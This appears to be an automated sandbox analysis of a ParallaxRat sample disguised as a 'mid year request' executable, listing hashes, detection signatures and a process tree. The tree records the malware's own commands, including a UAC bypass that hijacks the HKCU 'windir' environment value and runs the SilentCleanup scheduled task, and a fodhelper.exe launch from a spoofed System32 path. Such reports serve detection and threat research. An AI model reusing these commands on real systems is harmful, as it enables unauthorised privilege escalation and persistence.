Analysis

  • max time kernel
    132s
  • max time network
    156s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    10-07-2020 09:24

General

  • Target

    SOYKAL MID YEAR REQUEST 202090404885554540000009004954.exe

  • Size

    1.5MB

  • MD5

    0789465bc17bc4852eb45209aab31f7c

  • SHA1

    bab2316f721d23b3607ee888be673ef76311b184

  • SHA256

    f37f40245387cf924b4692267251875273ef75ad03fa9f92d73ab021f5c9e307

  • SHA512

    b78884bad9029d83ea16a6cd1041cbc4e1b8fd1cf371682bc43a54ed6b5ca542cfd19d13b3cb5ba869d0fdd76f1864c4354158231e68d45d9eb8f2ec074fbf2b

Malware Config

Signatures

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • ParallaxRat

    ParallaxRat is a multipurpose RAT written in MASM.

  • Suspicious use of WriteProcessMemory 527 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Executes dropped EXE 2 IoCs
  • ParallaxRat payload 1 IoCs

    Detects payload of Parallax Rat, a small portable Rat usually digitally signed with a Sectigo certificate.

  • Adds Run entry to start application 2 TTPs 1 IoCs
  • Modifies registry key 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SOYKAL MID YEAR REQUEST 202090404885554540000009004954.exe
    "C:\Users\Admin\AppData\Local\Temp\SOYKAL MID YEAR REQUEST 202090404885554540000009004954.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Suspicious use of SetThreadContext
    • Adds Run entry to start application
    PID:1460
    • C:\Windows\SysWOW64\TapiUnattend.exe
      "C:\Windows\System32\TapiUnattend.exe"
      2⤵
        PID:1328
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c C:\Users\Public\Natso.bat
          3⤵
            PID:2324
            • C:\Windows\SysWOW64\reg.exe
              reg delete hkcu\Environment /v windir /f
              4⤵
              • Modifies registry key
              PID:2424
            • C:\Windows\SysWOW64\reg.exe
              reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "
              4⤵
              • Modifies registry key
              PID:2440
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
              4⤵
                PID:2452
              • C:\Windows\SysWOW64\reg.exe
                reg delete hkcu\Environment /v windir /f
                4⤵
                • Modifies registry key
                PID:2468
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c C:\Users\Public\Runex.bat
              3⤵
                PID:2488
                • C:\Windows \System32\fodhelper.exe
                  "C:\Windows \System32\fodhelper.exe"
                  4⤵
                  • Executes dropped EXE
                  PID:2528
                • C:\Windows \System32\fodhelper.exe
                  "C:\Windows \System32\fodhelper.exe"
                  4⤵
                  • Executes dropped EXE
                  PID:2548
            • C:\Program Files (x86)\internet explorer\ieinstal.exe
              "C:\Program Files (x86)\internet explorer\ieinstal.exe"
              2⤵
                PID:2312

            Network

            MITRE ATT&CK Enterprise v6

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • memory/1460-124-0x0000000010410000-0x0000000010450000-memory.dmp

              Filesize

              256KB

            • memory/2312-126-0x0000000000400000-0x0000000000424000-memory.dmp

              Filesize

              144KB